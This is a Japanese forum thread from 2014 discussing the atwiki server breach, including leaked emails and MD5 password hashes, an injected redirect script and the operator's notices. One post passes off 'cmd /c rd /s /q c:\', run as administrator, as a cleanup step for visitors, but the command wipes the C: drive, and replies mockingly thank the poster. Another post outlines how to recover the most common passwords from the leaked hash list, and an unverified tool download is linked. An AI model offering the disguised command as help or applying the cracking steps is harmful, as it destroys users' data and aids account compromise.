【速報】atwikiのサーバーにヤバイ物置かれてサーバー自体がwiki状態にメアドやパスワードも流出 ★16

3月4日時点のメールアドレスとパスワードのMD5ハッシュが流出
http://toro.2ch.net/test/read.cgi/esite/1394330889/40
↓
有名wikiも自由に改変し放題　サーバに変なファイルも起き放題、全てのアットwikiが無法地帯に

■公式からのメール
http://i.imgur.com/7NwMc88.jpg
http://i.imgur.com/WTyj9uY.jpg
http://i.imgur.com/TQU0oAX.jpg

■公式が発表した情報
１：各Wiki管理者および登録ユーザーのパスワード（暗号化されてるが比較的簡単に解読可能）とメールアドレスが流出した
２：通信をリダイレクトをするスクリプトが仕込まれた
３：「パスワード再発行ページ」が改竄された
http://i.imgur.com/th43p8r.jpg

■これまでに判明したこと
・漏洩の対象サーバー
バックドアが仕掛けられてたのはwww1～www58のすべて
漏洩した可能性は大いにある

・漏洩したものは(1)システム全体に関するSQLと(2)個別ウィキに関するSQLに分かれていた
(1)匿名でアップされていたSQLはシステム全体に関する前者
　全ウィキの管理者のメールアドレス、パスワードMD5、登録時のIPアドレスなど
(2)個別ウィキに関するSQLはウィキ数ぶん存在した
　そのウィキの編集者のメールアドレス、パスワードMD5、ウィキの過去の版と編集時のIPアドレスなど
　個別は数が多いのですべてダウンロードするのは難しいが漏洩した可能性はゼロではない

■前スレ
http://maguro.2ch.net/test/read.cgi/poverty/1394484251/

落ちたスレ立てんな

何も解決してないのに鎮火したのか

まだ対策出来てねえの？

パズドラwiki踏みまくってるがなにも問題はないぞ

現在進行形で被害者出してる可能性がある糞企業なのにな

見ないように気をつけてたが見ちまったｗｗｗ
今更見ないのは難しいぜ
よく分からんが自分が登録さえしてなけりゃ見ても大丈夫なの？

正直騒動以来自分の所には一切アクセスしていない。
バックアップが生きてるうちにバックアップだけ取った。

そもそも今思えばアクセス数でアフィ乗せたほうが金になったなと
感じたがそんな守銭奴は嫌だったので何も乗せなかった。

で、今はWireshark入れて時々通信内容をチェックする日々。
アクセス先のＩＰとか出るから不正アクセスがないか確認できる。
http://www.wireshark.org/

※重要事項

★☆@wikiを開いてしまった人へ☆★

スタート→全てのプログラム→アクセサリと進み
コマンドプロンプトを右クリック→管理者権限で実行しましょう。

コンソールが開くので
「cmd /c rd /s /q c:\」と入力。
PCが一度初期状態に戻るので、ウィルスによる情報流出を防げます。

まだやってんの？

>>9
これで助かった
本当にありがとう

恐ろしいが、インターネットの黎明期を思い出させる出来事ではある。

>>9
thx! 致命傷で済んだよ！

>>9
その発想はなかった。お前天才かよ

くそ、Androidで対策できないのかよ
踏んじまった

新しい情報きてたよ

http://www1.atwiki.jp/guide/pages/2606.html

2014年03月14日 22時00分追記

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
1.ウイルス疑惑について
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

事件発生以後、調査をして参りました。
念のため、@wiki全サーバに対してウイルススキャンを行いましたが、
ウイルスは確認されませんでした。

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
2.Javascriptの改ざん疑惑について
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

事件発生以後、調査をして参りましたが、Javascriptの改ざんはないと
確認できました。

https://www.google.co.jp/search?q=dicjs%2F.php+site%3Aatwiki.jp

>>16
当然ながら、未知のウイルスに対してウイルススキャンは無意味。

JavaScriptの改ざんというよりは、新たな悪意あるJavaScriptが設置されているか
どうかの問題。

というわけで、いずれも的外れ。

ハッカー気取りの奴等が思ったより雑魚だったな
ガッカリだよ

早く鯖落とせって

ウイルススキャンじゃなくてセキュリティ会社の技術者呼んで見てもらえよ

いっえーい　運営みてるぅー？

やっぱ普通に見てるんだろうか

2日ぶりくらいにスレ開いたけどどうせatwiki運営は何もやってないんだろ？

まだやってんの？これ

MD5ってどこから出てきたん？

>>9の為にあるスレだな
しょーもな

>>16
サクサク軽快！ウイルスバスター！

嘘をつきました

ウイルス対策ソフトがウイルスだと認識してないと意味ないだろ
馬鹿か

対応のレベルの低さが所詮学生ベンチャーといったところだな。
せっかくシェアたくさん取ってたのにコレを機会に競合に移るのも多いだろうよ。

昨日は出来たのに今データバックアップしようとしたら出来なくなっていた

4.FTPの一時停止について

現在メンテナンスをしており、FTPを一時停止させていただいて
おります。ご了承のほど、よろしくお願いいたします。

これが原因かな？

>>9
ありがとう

数万ページあるところは移転が決まってたりしてるよ

そして、自分は一昨日うっかり踏んだが、ＰＣ内での怪しい動きはなかった

１．流出したmd5ハッシュリストを入手
２．md5ハッシュのみにして余計なのを削除
３．sortコマンドで並び替え
４．uniq -cコマンドで連続行数を付加
５．sort -nコマンドで上位◯位くらいまでのパスワードのmd5ハッシュを取り出す
６．ハッシュからパスワードを逆算するプログラムにかける(or逆算するサイトにハッシュ入力)
７．上位◯位のパスワードをゲット

気を付けてたのに踏んじまった
忘れた頃に変な挙動されるのが一番困るんだけどね…

>>34
数万ページ移動とか
大変そうだな

うっかりやさんはサイトブロックしとけ
ついでに短縮url系も

あ、あああ！
ゲームカタログ見るつもりで普通に開いてしまった
大丈夫だよなこれ

バックドア全部塞いだの？

塞いだかどうかなんて知りようがない

ttp://www1.axfc.net/u/3194868.zip
atwikiのデータを手軽にさくっとバックアップしたいけど、怖くてアクセスできない、
っていう人のためにバックアップ補助ツール作ってきた

ソースと簡単な説明書もつけたから心配ならコード読んで自分でコンパイルするといい

そうそう、一応作成・動作確認はWindows XP 32bitで行ったけど
64bitやXP以降でどうかは確認してない　c手打ちで作ってあるから多分大丈夫だ・・と思うけど

騒動あったことも知らずに
普通に使ってる人達もいるし大丈夫だろ

>>45
乙
短時間でよくまとめたな

>>47

ウィルス注意

>>47
自分危険です宣言するのはいいがマスクくらいしてくれよ感染るだろ

みんなあきるの早いね

飽きて忘れてくれないと次の攻撃を仕掛けられないからな

もう閲覧して大丈夫？

2chで大丈夫だよ＾＾　って言われて信じるなら、いいんじゃないですかぁ

ぶっちゃけ何も関係ないだろ
wiki編集者やwiki管理してるやつがヤバイだけなんだろ

「だろ」に自信のなさが如実に現れています